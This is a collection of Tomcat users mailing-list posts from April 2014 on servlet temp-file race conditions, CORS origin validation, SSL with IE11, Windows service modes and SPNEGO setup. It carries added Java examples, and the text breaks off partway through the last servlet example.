Re: Tomcat 8.0.3.0 getting never before seen by google Illegal State Exception. Servlets outputting the audio output from the previous runs of the program instead of the current run.

2014-04-30 Thread Konstantin Kolinko
2014-05-01 2:00 GMT+04:00 Hayward, Leigh :
> OK so I just spent an age trying to push my project to a GitHub repository but
> I think I must just be too tired to use my brain correctly.
> Eventually gave up and just pasted my servlet into a file there.
> https://github.com/Leighbee13/RUNTHIS/tree/master
> Let me know if this works!

An interesting servlet...

The problem is that the names of your temporary files are constant ones.

So if several requests come in at the same time, several users'
data will be written into the same file.

If a user hasn't completed downloading her file, and another request
comes in, the "finished.wav" file will be overwritten with new data.

Best regards,
Konstantin Kolinko

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
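To make the overwrite concrete, here is an added Java example (not the servlet from the GitHub link above and not Tomcat code) that runs eight simulated requests against one fixed file name and then against per-request names from Files.createTempFile; the class and method names are this example's own, and the "audio" payloads are constructed strings.

```java
import java.io.IOException;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.ArrayList;
import java.util.List;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.Future;

/**
 * Added example (not the servlet from the thread): the race that a constant
 * temporary-file name creates when several requests run at once, next to the
 * per-request-unique alternative. Class and method names are this example's own.
 */
public class TempFileRace {

    /** The pattern from the thread: every request writes the same fixed name. */
    static Path sharedOutput(Path dir) {
        return dir.resolve("finished.wav");
    }

    /** Fix: the JDK generates a name that no other request can be using. */
    static Path perRequestOutput(Path dir) throws IOException {
        return Files.createTempFile(dir, "finished-", ".wav");
    }

    /**
     * Simulates one request: write this user's data, then read it back as the
     * "download". Returns what the client would have received.
     */
    static String handleRequest(Path out, String payload) throws IOException {
        Files.write(out, payload.getBytes(StandardCharsets.UTF_8));
        // The window between finishing the file and the client reading it.
        try {
            Thread.sleep(50);
        } catch (InterruptedException e) {
            Thread.currentThread().interrupt();
        }
        return new String(Files.readAllBytes(out), StandardCharsets.UTF_8);
    }

    /** Runs {@code requests} concurrent requests and counts wrong downloads. */
    static int countWrongDownloads(boolean uniqueNames, int requests) throws Exception {
        Path dir = Files.createTempDirectory("race-demo");
        ExecutorService pool = Executors.newFixedThreadPool(requests);
        List<Future<Boolean>> results = new ArrayList<>();
        for (int i = 0; i < requests; i++) {
            final String payload = "audio-of-user-" + i; // constructed sample data
            results.add(pool.submit(() -> {
                Path out = uniqueNames ? perRequestOutput(dir) : sharedOutput(dir);
                try {
                    return payload.equals(handleRequest(out, payload));
                } finally {
                    if (uniqueNames) {
                        Files.deleteIfExists(out); // clean up once the "download" is done
                    }
                }
            }));
        }
        int wrong = 0;
        for (Future<Boolean> f : results) {
            if (!f.get()) {
                wrong++;
            }
        }
        pool.shutdown();
        Files.deleteIfExists(sharedOutput(dir));
        Files.deleteIfExists(dir);
        return wrong;
    }

    public static void main(String[] args) throws Exception {
        System.out.println("constant name,    wrong downloads: " + countWrongDownloads(false, 8));
        System.out.println("per-request name, wrong downloads: " + countWrongDownloads(true, 8));
    }
}
```

With the constant name most of the eight "downloads" come back holding another user's bytes; with per-request names every request reads only what it wrote, and deleting the file once its download is done also keeps one user's output from ever being served to the next.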



RE: Tomcat 8.0.3.0 getting never before seen by google Illegal State Exception. Servlets outputting the audio output from the previous runs of the program instead of the current run.

2014-04-30 Thread Hayward, Leigh
I prematurely sent that one, not even sure I had much more
to add, probably just more eternal gratitude to Chris. Outlook
has completely screwed up the formatting of this email so I
don't know what's what and what's where. I'm shaking with
stress and tiredness so I'm going to go home, sleep and find
a way to force another email program onto this computer
tomorrow.

Thanks to anyone taking the time to read this,
Leigh

From: Hayward, Leigh 
Sent: 30 April 2014 15:31
To: users@tomcat.apache.org
Subject: Tomcat 8.0.3.0 getting never before seen by google Illegal State
Exception. Servlets outputting the audio output from the previous runs of the
program instead of the current run.

Hello all,

My Java EE web application takes in multiple audio inputs and outputs
them as a single wav file via an application/octet stream.

It seemingly randomly works correctly (i.e. outputting the correctly
manipulated audio file) but sometimes, the file from a previous
run of the program is output and I get one of these errors:

SEVERE [http-nio-8084-exec-30] 
org.apache.catalina.loader.WebappClassLoader.clearReferencesThreads The web 
application [/MyApp] is still processing a request that has yet to finish. This 
is very likely to create a memory leak. You can control the time allowed for 
requests to finish by using the unloadDelay attribute of the standard Context 
implementation.

and to me seemingly random numbers of these errors:

"SEVERE [http-nio-8084-exec-87] 
org.apache.coyote.http11.AbstractHttp11Processor.process Error processing 
request java.lang.IllegalStateException: The resources may not be accessed if 
they are not currently started?"

The files always upload correctly to my filesystem, but something is
going wrong when I try to access them in order to process them.

Also when it is downloading the file it appears to the user
to be several MB long despite the file that is output being only a few
thousand KB.

Sometimes when it doesn't work it does not produce these errors, but it
never produces these errors when it works correctly.

I have googled it but there's no reference to the second kind of error
anywhere on the web aside from svn commits by Tomcat developers,
so while I am a total newbie to mailing lists, after exhausting
Stack Overflow this seemed like the only place to turn to. I'm
developing a Java EE web application in NetBeans using Tomcat
8.0.3.0 on a Windows 7 operating system.

The web application is very basic and allows users to upload files via a
multipart HTML form. This then posts to a servlet which first uploads these
files to the program's file system and then accesses them, concatenates
them together and saves them back on the file system.
It's better explained by this diagram: http://imgur.com/Oacd4gq
Could it be that the files are not being uploaded fully before they are
being accessed?

Sorry if this email looks like shit; I'm being forced to use Outlook
by my university!

Thank you for taking the time to read my post.

Best wishes to you all regardless,
Leigh



RE: Tomcat 8.0.3.0 getting never before seen by google Illegal State Exception. Servlets outputting the audio output from the previous runs of the program instead of the current run.

2014-04-30 Thread Hayward, Leigh
OK so I just spent an age trying to push my project to a GitHub repository but
I think I must just be too tired to use my brain correctly.
Eventually gave up and just pasted my servlet into a file there.
https://github.com/Leighbee13/RUNTHIS/tree/master
Let me know if this works!
> From: Christopher Schultz
> Sent: 30 April 2014 20:13
> To: Tomcat Users List
> Subject: Re: Tomcat 8.0.3.0 getting never before seen by google Illegal State
> Exception. Servlets outputting the audio output from the previous runs of the
> program instead of the current run.

> Leigh,
>
> On 4/30/14, 1:55 PM, Hayward, Leigh wrote:
>> Hi Chris, Thank you so much for the speedy response . I have no
>> idea what i'm doing formatting wise. Pretty much just wrapping and
>> indenting all by hand  so forgive me if it's a mess!
>>
>>> From: Christopher Schultz
>>> Sent: 30 April 2014 17:58
>>> To: Tomcat Users List
>>> Subject: Re: Tomcat 8.0.3.0 getting never before seen by google Illegal
>>> State Exception. Servlets outputting the audio output from the previous
>>> runs of the program instead of the current run.
>>
>> Leigh,
>>
>> On 4/30/14, 10:31 AM, Hayward, Leigh wrote:
>>> My Java EE web application takes in multiple audio inputs
>>> and outputs them as a single wav file via an
>>> application/octet stream.
>
> Like a mixer?
>
>> Like a concatenator, adds songs one after the other into one long
>> song. It then overlays (mixes) another file into it containing
>> audio cues on top of the concatenated music. But the issue is
>> definitely arising at the concatenation phase.

> Okay. Are you saying that you don't get the output file you are
> expecting given a set of input files, even when under test conditions
> (a single request)?

> Do you accept all files at once for upload and return a single
> concatenated file, or do you upload the files one at a time and then
> request the completed file at the end of the workflow?

Yes, I'm not getting the output I expect given the inputs; I'm getting
the output that would have happened with a previous input.

Yes, the form has an unknown number of file inputs and they are
all submitted at once.

>> I have the audio writing to a file after each song is added in
>> the concatenation phase so that i can audibly debug and the
>> concatenator is definitely struggling to find the uploaded
>> files.

> What do you mean "struggling to find the uploaded files"? Your file
> upload library should be readily giving the files to you.

By struggling I just mean that the concatenate method is where the
incorrect audio output begins being produced instead of the correct
one. At least as far as I can tell from my

>>> It seemingly randomly works correctly (i.e. outputting the
>>> correctly manipulated audio file) but sometimes, the file
>>> from a previous run of the program is output and I get one of
>>> these errors:
>>>
>>> SEVERE [http-nio-8084-exec-30]
>>> org.apache.catalina.loader.WebappClassLoader.clearReferencesThreads
>>> The web application [/MyApp] is still processing a request that has
>>> yet to finish. This is very likely to create a memory leak.
>>> You can control the time allowed for requests to finish by
>>> using the unloadDelay attribute of the standard Context
>>> implementation.
>>>
>>> and to me seemingly random numbers of these errors:
>>>
>>> "SEVERE [http-nio-8084-exec-87]
>>> org.apache.coyote.http11.AbstractHttp11Processor.process
>>> Error processing request java.lang.IllegalStateException: The
>>> resources may not be accessed if they are not currently
>>> started?"
>
>
> These kinds of things are almost always due to storing of a request
> or response option in some kind of structure that survives past the
> end of a particular request.
>
> Can you explain how you build the response -- specifically
> involving any non-standard threading you may do?
>
>> The response is built in a method called finish which is called
>> in doPost like this :
>
>> finish(req, res); In finish I make a printwriter I set response
>> content type to "application/octet-stream", set the header
>> "Content-Disposition" to "attachment; filename=finished.wav" I
>> make a FileInputStream of the finished filepath Then I set the
>> header content length to the length of the finished file. then I
>> while loop the fileInputStream into the printwriter Then I close
>> the FIS.

> That seems fairly straightforward. Why are you bothering with a
> PrintWriter? The existing response OutputStream ought to be good
> enough to pump bytes through. How are you pumping the bytes? Just a
> simple, locally-declared byte array?

The online examples use PrintWriters so I used a PrintWriter.
I've now changed it to the res's own output stream but it made no
difference to the output.

I'm just using:
int i;
while ((i = fileInputStream.read()) != -1) {
    out.write(i);
}

Re: CORS issue with Tomcat and Android Webview

2014-04-30 Thread Terence M. Bandoian

On 4/28/2014 3:21 PM, Konstantin Kolinko wrote:

2014-04-28 23:44 GMT+04:00 Terence M. Bandoian :

On 4/27/2014 11:36 AM, Konstantin Kolinko wrote:

2014-04-27 0:50 GMT+04:00 Terence M. Bandoian :

On 4/26/2014 1:13 AM, Ankit Singhal wrote:

On Sat, Apr 26, 2014 at 12:53 AM, Terence M. Bandoian

Hi, Ankit-

Where did you see  documented?  I see an 
named
cors.allowed.origins on the Tomcat web site:

https://tomcat.apache.org/tomcat-7.0-doc/config/filter.html#CORS_Filter

In any case, I agree that if allowed origins is set to "*", all CORS
requests should be allowed.  As I understand it, the W3C spec only
requires
that the Origin header exists:

http://www.w3.org/TR/cors/#resource-processing-model

It also states that it is acceptable for Origin headers to always match
the
list of allowed origins when the list is "unbounded".


1. From a quick reading, I do not see any syntax for that lists
besides exact case-sensitive matches.

http://tools.ietf.org/html/rfc6454#section-7
says that the syntax of origin header is

 serialized-origin   = scheme "://" host [ ":" port ]
 ; <scheme>, <host>, <port> from RFC 3986

Nothing says that "host" can be omitted.

http://tools.ietf.org/html/rfc6454#section-6.1
Per Sections 6.1 and 6.2 the correct serialized value of such
"file://" origin will be "null".

2. Some form of sanity check must be present,
because the origin header value is sent back to client and as such can
be abused.

3. That said,
I think that CorsFilter.isValidOrigin(String) can be patched to
a) Be more strict to the specified syntax  (and not just allow any URI)
(Not actually necessary, but it will allow to reject non-conforming
clients).

b) Specifically white-list the "null" origin.

c) Specifically white-list a "file://" origin, with the notion that that
is a bug in certain Android versions


Maybe this is a good case to submit a bug report or a patch.

Agreed.

Best regards,
Konstantin Kolinko



Hi, Konstantin-

I agree there is value in validating the origin header value and with your
interpretation of the IETF origin header specification.  I was referring to:

 http://www.w3.org/TR/cors/#resource-requests

which includes:

 1. If the Origin header is not present terminate this set of steps. The
request is outside the scope of this specification.

 2. If the value of the Origin header is not a case-sensitive match for
any of the values in list of origins, do not set any additional headers and
terminate this set of steps.

 Note: Always matching is acceptable since the list of origins can be
unbounded.

The solution you propose makes sense to me and I think will work although
I'm a little unclear about a).  Do you mean adding a test for a null host
value?

In a) I meant that  on Origin header is either "null" (4 characters literally),
or  "scheme "://" host [ ":" port ]".

It is not an URI. So in theory the check can be more strict, that
there is no "path", "query", "anchor" or whatever additional URI
components can be there.

(Though I see no real worth in being that strict. A small worth is to
encourage clients to behave correctly, if there are some misbehaving
ones).

Best regards,
Konstantin Kolinko



One alternative solution might be to reduce origin header validation to 
checking for invalid characters only. It may be a little sloppy but 
would eliminate the need to add to a hardcoded whitelist for every 
client that doesn't comply with the origin header spec.


Another would be to add a cors.allowed.invalidorigins initialization 
parameter. This would allow for strict validation of origin headers with 
configurable whitelisting of invalid values.


-Terence Bandoian
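An added example of the stricter check sketched in points 1 to 3 above (this is not Tomcat's CorsFilter.isValidOrigin and uses none of Tomcat's API): it accepts only the RFC 6454 serialized-origin form or the literal "null", never reflects a value that failed that check, and keeps the "null" and "file://" exceptions behind explicit switches whose names (allowNullOrigin, allowFileOrigin) are this example's own; the sample header values in main are constructed.

```java
import java.util.Arrays;
import java.util.Collections;
import java.util.List;
import java.util.regex.Pattern;

/**
 * Added example of the stricter Origin validation discussed in the thread.
 * This is not Tomcat's CorsFilter; the class, the method names and the
 * allowNullOrigin / allowFileOrigin switches are this example's own.
 */
public final class OriginCheck {

    /** RFC 6454 section 7: serialized-origin = scheme "://" host [ ":" port ]. */
    private static final Pattern SERIALIZED_ORIGIN = Pattern.compile(
            "^[A-Za-z][A-Za-z0-9+.-]*://"                   // scheme
            + "(?:\\[[0-9A-Fa-f:.]+\\]|[A-Za-z0-9._~%-]+)"  // host: IPv6 literal, IPv4 or reg-name
            + "(?::[0-9]{1,5})?$");                         // optional port; no path, query or fragment

    private final List<String> allowedOrigins; // exact, case-sensitive entries, or "*"
    private final boolean allowNullOrigin;     // accept the literal "null" origin (RFC 6454 section 6.2)
    private final boolean allowFileOrigin;     // accept the non-conforming "file://" some Android builds send

    public OriginCheck(List<String> allowedOrigins, boolean allowNullOrigin, boolean allowFileOrigin) {
        this.allowedOrigins = Collections.unmodifiableList(allowedOrigins);
        this.allowNullOrigin = allowNullOrigin;
        this.allowFileOrigin = allowFileOrigin;
    }

    /** True only for a well-formed serialized origin or the literal "null". */
    public static boolean isWellFormed(String origin) {
        return origin != null
                && (origin.equals("null") || SERIALIZED_ORIGIN.matcher(origin).matches());
    }

    /**
     * Returns the value to send in Access-Control-Allow-Origin, or null when the
     * request must be refused. Only a value that passed the syntax check, or one
     * of the two explicitly enabled exceptions, is ever reflected back to the
     * client, so a malformed header is never bounced back in a response header.
     */
    public String allowOriginHeader(String origin) {
        if (origin == null) {
            return null;                     // no Origin header: not a CORS request at all
        }
        if (origin.equals("null")) {
            return allowNullOrigin ? "null" : null;
        }
        if (origin.equals("file://")) {
            return allowFileOrigin ? origin : null;
        }
        if (!isWellFormed(origin)) {
            return null;                     // reject before any list lookup
        }
        boolean listed = allowedOrigins.contains("*") || allowedOrigins.contains(origin);
        return listed ? origin : null;
    }

    public static void main(String[] args) {
        OriginCheck strict = new OriginCheck(Arrays.asList("*"), false, false);
        OriginCheck lenient = new OriginCheck(Arrays.asList("https://app.example"), true, true);
        // constructed sample Origin header values
        String[] samples = {
            "https://app.example", "http://[::1]:8080", "null", "file://",
            "https://app.example/path", "https://app.example#frag", "no-scheme.example"
        };
        for (String s : samples) {
            System.out.printf("%-26s strict=%-20s lenient=%s%n", s,
                    strict.allowOriginHeader(s), lenient.allowOriginHeader(s));
        }
    }
}
```

Two things worth noting when adopting such switches: "null" is also what browsers send for sandboxed iframes and some redirected requests, so enabling allowNullOrigin grants more than just local files; and keeping the syntax check ahead of the list lookup means a "*" configuration still never reflects anything that is not a serialized origin.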




RE: Setup Issue tomcat 6 SLES 11 SSL

2014-04-30 Thread Martin Gainty
> Date: Wed, 30 Apr 2014 14:01:11 -0500
> From: tere...@tmbsw.com
> To: users@tomcat.apache.org
> Subject: Re: Setup Issue tomcat 6 SLES 11 SSL
> 
> On 4/30/2014 9:02 AM, Christopher Schultz wrote:
> >
> > Vincent,
> >
> > On 4/29/14, 4:24 PM, Vincent T. DiScipio wrote:
> >> I have setup tomcat 6 on SLES 11 and secured the instance with an
> >> external certificate if authority.  The following is occurring
> >> from the same machine using both IE and Firefox:
> >>
> >> http://servername.wooster.edu:8080 works for both IE11 and
> >> Firefox 29 and displays the index.html
> >>
> >> https://servername.wooster.edu:8443  works for Firefox 29 and
> >> displays the index.html
> >>
> >> https://servername.wooster.edu:8443  does not work for IE11v
> >> displays "This page can't be displayed"
> >>
> >> I have changed the logging level to finest and do not see any
> >> errors in the catalina.out.
> >>
> >> Thoughts?  I have the same setup on another server and I believe
> >> the files and permission levels are set the same.
> > What does your SSL configuration look like?
> >
> > You could also use either sslscan from the CLI or go to
> > https://www.ssllabs.com/ssltest/ and use their online tool to examine
> > the site from the outside.
> >
> > Perhaps you have a combination of protocols and ciphers that MSIE
> > can't handle.
> >
> > - -chris
> 
> 
> If the option is available, you might also try disabling the IE 
> "friendly" error messages.  I'm not sure about IE 11, but it seems like 
> previous versions displayed an error message with a reddish background 
> if they were unable to authenticate a server with a given SSL 
> certificate.  Was a certificate authority bundle supplied with the SSL 
> certificate?  If so, is it installed and configured?  Were the SSL 
> certificates on the both servers issued by the same company?
> 
> -Terence Bandoian
> 
MG>IE / Internet Options / Tools / Content / Certificates / Import
MG>Import the provided certificate into CA Trusted Root


Re: Difference between Tomcat Window Service mode ?

2014-04-30 Thread Konstantin Kolinko
2014-05-01 1:10 GMT+04:00 Sebastien Tardif:
> What is the difference between Tomcat Window Service mode ?
>
> Which one is better?
>
> I believe one of them is more “friendly” with JConsole so that the Tomcat
> instance is listed as a list of JVM running locally?

No. Not at all.

>
> Extract from 
> http://tomcat.apache.org/tomcat-7.0-doc/windows-service-howto.html
> --StartMode
>
> executable
>
> Can one of jvm, java or exe
>


Those are Service Wrapper modes (Apache Commons Daemon jsvc).
It can wrap different programs and can start JRE in different ways.

http://commons.apache.org/proper/commons-daemon/jsvc.html




Difference between Tomcat Window Service mode ?

2014-04-30 Thread Sebastien Tardif
What is the difference between Tomcat Window Service mode ?

Which one is better?

I believe one of them is more “friendly” with JConsole so that the Tomcat
instance is listed as a list of JVM running locally?

Extract from http://tomcat.apache.org/tomcat-7.0-doc/windows-service-howto.html
--StartMode

executable

Can one of jvm, java or exe

Re: Need How-To Authenticate with built-in SPNEGO and Authorize with a DataSourceRealm or JAAS database role lookup.

2014-04-30 Thread Felix Schumacher


On 29. April 2014 20:28:14 MESZ, "Troyer, Ron"  
wrote:
>Hi,
>
>I am new to Tomcat and need some guidance.
>
>I am trying to setup a Tomcat 7.0.53 instance on a Windows 7 box, using
>JDK 1.7_51.  
>
>I have read the section of the documentation about Windows
>Authentication, but I am confused at this point.  From the
>documentation I have been unable to determine how to configure my
>realms and JAAS to authenticate with SPNEGO and authorize with a
>database lookup.  For one thing I don't understand the difference
>between the krb5 initiate and accept entries in the example JAAS
>configuration.  Looking at the documentation for the Realms, it looks
>like I want to specify a JAASRealm of some sort.  From other things I
>have done, I think I need to make the Krb5LoginModule as requisite and
>use some other login module to do the DB lookup for the roles.

You can use the DataSourceRealm as written in the windows authentication 
section.
Tomcat will use the user and role definitions, but ignore the passwords.

Regards
 Felix
>
>I am sure someone has had to do this in the past, and I am hoping they
>can show me how to do it.
>





RE: Setup Issue tomcat 6 SLES 11 SSL

2014-04-30 Thread Vincent T. DiScipio
Terence, 

I poked around in the configuration file and knew it was something I did to 
screw it up.  I just scrapped the install and started from fresh. 

Thanks for the reply

Vince DiScipio
Director of Digital Infrastructure
The College of Wooster
P - 330-263-2612
F - 330-263-2666 

-Original Message-
From: Terence M. Bandoian [mailto:tere...@tmbsw.com] 
Sent: Wednesday, April 30, 2014 3:01 PM
To: Tomcat Users List
Subject: Re: Setup Issue tomcat 6 SLES 11 SSL

On 4/30/2014 9:02 AM, Christopher Schultz wrote:
>
> Vincent,
>
> On 4/29/14, 4:24 PM, Vincent T. DiScipio wrote:
>> I have setup tomcat 6 on SLES 11 and secured the instance with an 
>> external certificate if authority.  The following is occurring from 
>> the same machine using both IE and Firefox:
>>
>> http://servername.wooster.edu:8080 works for both IE11 and
>> Firefox 29 and displays the index.html
>>
>> https://servername.wooster.edu:8443  works for Firefox 29 and 
>> displays the index.html
>>
>> https://servername.wooster.edu:8443  does not work for IE11v displays 
>> "This page can't be displayed"
>>
>> I have changed the logging level to finest and do not see any errors 
>> in the catalina.out.
>>
>> Thoughts?  I have the same setup on another server and I believe the 
>> files and permission levels are set the same.
> What does your SSL configuration look like?
>
> You could also use either sslscan from the CLI or go to 
> https://www.ssllabs.com/ssltest/ and use their online tool to examine 
> the site from the outside.
>
> Perhaps you have a combination of protocols and ciphers that MSIE 
> can't handle.
>
> - -chris


If the option is available, you might also try disabling the IE "friendly" 
error messages.  I'm not sure about IE 11, but it seems like previous versions 
displayed an error message with a reddish background if they were unable to 
authenticate a server with a given SSL certificate.  Was a certificate 
authority bundle supplied with the SSL certificate?  If so, is it installed and 
configured?  Were the SSL certificates on the both servers issued by the same 
company?

-Terence Bandoian





Re: High CPU Usage on restarting the Tomcat 7.0.39

2014-04-30 Thread srinivas rapolu
#1. Sorry, was not aware of attachments. Uploaded screenshot at:
http://www.imageurlhost.com/images/souyh4ks07ber4kwu9u.png

#2. Connector details from server.xml



On Wed, Apr 30, 2014 at 3:50 PM, Konstantin Kolinko
wrote:

> 2014-04-30 23:41 GMT+04:00 srinivas rapolu :
> > We are using Tomcat 7.0.39 ((java version "1.7.0_25"), and Sometimes CPU
> > goes high when we restart the TOMCAT.
> >
> > We have to stop the Tomcat in-order to release the release resources and
> > again restarting the Tomcat fixes the problem.
> >
> > On profiling, found that Invocations on
> > sum.rmi.transport.tcp.TCPTransport$ConnectionHandler.run() keep on
> getting
> > increased and occupy more CPU.
> >
> > Please find attachment for more information. Any help/clue on this is
> > appreciated.
> >
>
>
> 1. Attachments are not allowed on this mailing list. The mailing list
> server will remove them.
>
> http://tomcat.apache.org/lists.html#tomcat-users
> -> 7.
>
> 2. What connector implementation are you using and how it is configured?
>
> 3. Take a thread dump when that issue happens.
>
>
> http://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>
> 4.
> http://wiki.apache.org/tomcat/HowTo/FasterStartUp
>


Re: High CPU Usage on restarting the Tomcat 7.0.39

2014-04-30 Thread Christopher Schultz

Srinivas,

On 4/30/14, 3:41 PM, srinivas rapolu wrote:
> We are using Tomcat 7.0.39 ((java version "1.7.0_25"), and
> Sometimes CPU goes high when we restart the TOMCAT.
> 
> We have to stop the Tomcat in-order to release the release
> resources and again restarting the Tomcat fixes the problem.
> 
> On profiling, found that Invocations on 
> sum.rmi.transport.tcp.TCPTransport$ConnectionHandler.run() keep on
> getting increased and occupy more CPU.
> 
> Please find attachment for more information. Any help/clue on this
> is appreciated.

Your attachment was stripped. Please paste any information inline.

- -chris




Re: High CPU Usage on restarting the Tomcat 7.0.39

2014-04-30 Thread Konstantin Kolinko
2014-04-30 23:41 GMT+04:00 srinivas rapolu :
> We are using Tomcat 7.0.39 ((java version "1.7.0_25"), and Sometimes CPU
> goes high when we restart the TOMCAT.
>
> We have to stop the Tomcat in-order to release the release resources and
> again restarting the Tomcat fixes the problem.
>
> On profiling, found that Invocations on
> sum.rmi.transport.tcp.TCPTransport$ConnectionHandler.run() keep on getting
> increased and occupy more CPU.
>
> Please find attachment for more information. Any help/clue on this is
> appreciated.
>


1. Attachments are not allowed on this mailing list. The mailing list
server will remove them.

http://tomcat.apache.org/lists.html#tomcat-users
-> 7.

2. What connector implementation are you using and how it is configured?

3. Take a thread dump when that issue happens.

http://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F

4.
http://wiki.apache.org/tomcat/HowTo/FasterStartUp




High CPU Usage on restarting the Tomcat 7.0.39

2014-04-30 Thread srinivas rapolu
We are using Tomcat 7.0.39 ((java version "1.7.0_25"), and Sometimes
CPU goes high when we restart the TOMCAT.

We have to stop the Tomcat in-order to release the release resources
and again restarting the Tomcat fixes the problem.

On profiling, found that Invocations on
sum.rmi.transport.tcp.TCPTransport$ConnectionHandler.run() keep on
getting increased and occupy more CPU.

Please find attachment for more information. Any help/clue on this is
appreciated.


Re: Tomcat 8.0.3.0 getting never before seen by google Illegal State Exception. Servlets outputting the audio output from the previous runs of the program instead of the current run.

2014-04-30 Thread Christopher Schultz

Leigh,

On 4/30/14, 1:55 PM, Hayward, Leigh wrote:
> Hi Chris, Thank you so much for the speedy response . I have no
> idea what i'm doing formatting wise. Pretty much just wrapping and
> indenting all by hand  so forgive me if it's a mess!
> 
>> From: Christopher Schultz
>> Sent: 30 April 2014 17:58
>> To: Tomcat Users List
>> Subject: Re: Tomcat 8.0.3.0 getting never before seen by google Illegal
>> State Exception. Servlets outputting the audio output from the previous
>> runs of the program instead of the current run.
> 
> Leigh,
> 
> On 4/30/14, 10:31 AM, Hayward, Leigh wrote:
>>> My Java EE web application takes in multiple audio inputs
>>> and outputs them as a single wav file via an
>>> application/octet stream.
> 
> Like a mixer?
> 
>> Like a concatenator, adds songs one after the other into one long
>> song. It then overlays (mixes) another file into it containing 
>> audio cues on top of the concatenated music. But the issue is 
>> definitely arising at the concatenation phase.

Okay. Are you saying that you don't get the output file you are
expecting given a set of input files, even when under test conditions
(a single request)?

Do you accept all files at once for upload and return a single
concatenated file, or do you upload the files one at a time and then
request the completed file at the end of the workflow?

>> I have the audio writing to a file after each song is added in
>> the concatenation phase so that i can audibly debug and the 
>> concatenator is definitely struggling to find the uploaded
>> files.

What do you mean "struggling to find the uploaded files"? Your file
upload library should be readily giving the files to you.

>>> It seemingly randomly works correctly (i.e. outputting the
>>> correctly manipulated audio file) but sometimes, the file
>>> from a previous run of the program is output and I get one of
>>> these errors:
>>>
>>> SEVERE [http-nio-8084-exec-30]
>>> org.apache.catalina.loader.WebappClassLoader.clearReferencesThreads
>>> The web application [/MyApp] is still processing a request that has
>>> yet to finish. This is very likely to create a memory leak.
>>> You can control the time allowed for requests to finish by
>>> using the unloadDelay attribute of the standard Context
>>> implementation.
>>>
>>> and to me seemingly random numbers of these errors:
>>>
>>> "SEVERE [http-nio-8084-exec-87]
>>> org.apache.coyote.http11.AbstractHttp11Processor.process
>>> Error processing request java.lang.IllegalStateException: The
>>> resources may not be accessed if they are not currently
>>> started?"
> 
> 
> These kinds of things are almost always due to storing of a request
> or response option in some kind of structure that survives past the
> end of a particular request.
> 
> Can you explain how you build the response -- specifically
> involving any non-standard threading you may do?
> 
>> The response is built in a method called finish which is called
>> in doPost like this :
> 
>> finish(req, res); In finish I make a printwriter I set response
>> content type to "application/octet-stream", set the header
>> "Content-Disposition" to "attachment; filename=finished.wav" I
>> make a FileInputStream of the finished filepath Then I set the
>> header content length to the length of the finished file. then I
>> while loop the fileInputStream into the printwriter Then I close
>> the FIS.

That seems fairly straightforward. Why are you bothering with a
PrintWriter? The existing response OutputStream ought to be good
enough to pump bytes through. How are you pumping the bytes? Just a
simple, locally-declared byte array?

You should remember to flush and/or close the output stream as well. I
think Tomcat will flush and close this for you, but you might want to
check to see if it changes anything.

>> I have not touched threading since it looks terrifying. I did
>> experiment with making the servlet singlethreaded since I thought
>> it could have something to do with threads (bad practice I know)
>> but that did nothing to help.

Are you using any variables that have been declared at the class
level? Everything you do with a request should be declared inside of
the service method (or doPost, etc.) or a parameter passed-into a
utility method. Don't store references to request, response, etc.
outside of the thread of execution that is handling that request.

If single-threading fixes your problem (sounds like it doesn't), then
you have broken the above rule.

>>> The files always upload correctly to my filesystem, but
>>> something is going wrong when I try to access them in order
>>> to process them.
> 
> What mechanism do you use for upload?
> 
>> My servlet has a location set in the @multipartconfig tag that is
>> where all files are saved to and retrieved from. I am getting the
>> Parts from the request then iterating through them, for each part
>> that
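As an added illustration of the rule above, here is a Java example written for this page (not Leigh's servlet and not Tomcat code) that shows the broken shape, request-specific values kept in fields of the shared servlet instance, next to the fixed one, where everything request-specific is a local or a parameter and the download goes through the response's own OutputStream with a buffer and is flushed. It assumes the Servlet 3.1 API that Tomcat 8 ships; the URL patterns and the class and method names are this example's own, the sample bytes are constructed, and the raw byte copy stands in for the real WAV concatenation, which the page does not show.

```java
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;
import javax.servlet.ServletException;
import javax.servlet.annotation.MultipartConfig;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.servlet.http.Part;

/** The broken shape: one servlet instance serves every request, so anything
 *  kept in a field is shared by all requests running at the same time. */
@WebServlet("/broken-finish")
class BrokenFinishServlet extends HttpServlet {
    private Path finishedFile;                   // BUG: overwritten by the next request
    private HttpServletResponse currentResponse; // BUG: outlives the request it belongs to

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse res) throws IOException {
        currentResponse = res;
        finishedFile = Files.createTempFile("finished-", ".wav");
        Files.write(finishedFile, "constructed sample bytes".getBytes(StandardCharsets.UTF_8));
        // By now another thread may have replaced both fields with its own values.
        FixedFinishServlet.finish(currentResponse, finishedFile);
    }
}

/** The fixed shape: every request-specific value is a local or a parameter. */
@WebServlet("/finish")
@MultipartConfig
public class FixedFinishServlet extends HttpServlet {
    private static final int BUFFER_SIZE = 8 * 1024;

    @Override
    protected void doPost(HttpServletRequest req, HttpServletResponse res)
            throws ServletException, IOException {
        Path finished = Files.createTempFile("finished-", ".wav"); // unique per request
        try {
            concatenate(req, finished);
            finish(res, finished);
        } finally {
            Files.deleteIfExists(finished); // nothing of this request survives it
        }
    }

    /** Raw byte concatenation stands in for the real WAV merge (not shown on the page). */
    private static void concatenate(HttpServletRequest req, Path out)
            throws ServletException, IOException {
        try (OutputStream o = Files.newOutputStream(out)) {
            for (Part part : req.getParts()) {
                try (InputStream in = part.getInputStream()) {
                    copy(in, o);
                }
            }
        }
    }

    /** Builds the download from the response's own OutputStream, buffered, then flushes. */
    static void finish(HttpServletResponse res, Path file) throws IOException {
        res.setContentType("application/octet-stream");
        res.setHeader("Content-Disposition", "attachment; filename=finished.wav");
        res.setContentLengthLong(Files.size(file)); // Servlet 3.1
        try (InputStream in = Files.newInputStream(file);
             OutputStream out = res.getOutputStream()) {
            copy(in, out);
            out.flush();
        }
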